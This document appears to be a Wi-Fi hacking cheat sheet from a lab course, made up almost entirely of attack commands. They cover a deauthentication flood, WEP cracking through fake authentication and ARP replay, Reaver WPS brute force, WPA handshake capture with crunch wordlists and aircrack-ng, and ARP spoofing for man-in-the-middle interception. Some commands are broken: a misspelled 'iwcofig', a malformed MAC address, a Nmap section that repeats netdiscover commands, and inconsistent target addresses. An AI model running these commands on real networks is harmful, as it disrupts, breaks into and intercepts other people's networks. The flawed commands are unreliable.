× Main Lab Setup Network Hacking - Wi-Fi MAC Change Wi-FI mode Packet Sniffing Deauthentication attack

LAB SETUP

Steps


Network Hacking - Wi-Fi

Steps

Cracking types

Wi-Fi adapter requirements

Wi-Fi adapter - recommended

Wi-Fi adapter - setup in virtualBox


MAC change

What it is?

Why change?

How to change?


Wi-Fi mode change

Modes

How to change?

is this adapter support monitor mode?


Packet Sniffing

Wi-Fi BANDS

In Windows - Microsoft Network Monitor

use AIRODUMP-NG


    # iwcofig

    // mon0 - The name of the interface that is in monitor mode.
    # airodump-ng mon0

    // Get 5GHz also
    # airodump-ng --band a mon0

    // Get 2.4 and 5 GHz also
    # airodump-ng --band abg mon0

    // pass - (BSSID & CH) ,  write to file
    # airodump-ng --bssid 00::11::22::33::44::55 --channel 2 --write test mon0
    
    // Run wireshark and open the test-01.cap file and check the data.
    # wireshark


Deauthentication Attack

What?

USE AIRPLAY-NG


    // a - target / router , c - client , 100000000 - no of packets
    # aireplay-ng --deauth 100000000 -a F8:23:B2:B9:50:AB -c F9:24:B3:B0:51:AC mon0

    // In another terminal
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 mon0
        

WEP Cracking (Gaining Access )

About?

Vulnerability?

AIRODUMP-NG & aircrack-ng


    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write basic_wep mon0

    // To crack key
    # aircrack-ng basic_wep-01.cap

Fake Authentication attack


    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write arpreplay mon0

    // a - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --fakeauth 0 -a F9:24:B3:B0:51:AC -h F2:34:B4:B0:61:BC mon0

    // To crack key
    # aircrack-ng arpreplay-01.cap

ARP Request Replay attack


    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write arpreplay mon0

    // b - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --arpreplay -b F9:24:B3:B0:51:AC -h F2:34:B4:B0:61:BC mon0

    // To crack key
    # aircrack-ng arpreplay-01.cap


WPA / WPA 2 Cracking

About?

Vulnerability?

Reaver - use if WPS enabled


    // collect packets
    # wash --interface mon0

    // b - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --fakeauth 30 -a F9:24:B3:B0:51:AC -h F2:34:B4:B0:61:BC mon0

    // To crack key , vvv - more info
    # reaver --bssid F9:24:B3:B0:51:AC --channel 1 --interface mon0 -vvv 

Wordlist attack - use if WPS disabled


    // collect packets
    # airodump-ng --bssid F9:24:B3:B0:51:AC --channel 2 --write wpa_handshake mon0

    // b - target , h - your device (ifconfig - first 12 digits of unspec - change '-' to ':')
    # aireplay-ng --deauth 4 -a F9:24:B3:B0:51:AC -c F2:34:B4:B0:61:BC mon0


    // To create a wordlist
    // crunch [min][max][charactres] -t [pattern] -o [filename]
    # crunch 6 8 123abc$ -o wordlist -t a@@@@b


    // To get the password
    # aircrack-ng wpa_handshake-01.cap -w test.txt


Post connection attacks

About?

Net discover


    // find your IP (eg : 10.0.2.16)
    # ifconfig

    // To Display all devices on the network
    # netdiscover -r 10.0.2.1/24

Nmap / Zenmap


    // find your IP (eg : 10.0.2.16)
    # ifconfig

    // To Display all devices on the network
    # netdiscover -r 10.0.2.1/24


MITM - Man In The Mddle Attack (POST CA)

ARP Poisoning

ARP Spoofing - use ARPSPOOF


            // arpspoof -i [interface] -t [clientIP] [gatewayIP]
            // arpspoof -i [interface] -t [gatewayIP] [clientIP]
            
            # arpspoof -i eth0 -t 10.0.2.3 10.0.2.1
            # arpspoof -i eth0 -t 10.0.2.1 10.0.2.3

            // forward data to original destination
            # echo 1 > /proc/sys/net/ipv4/ip_forward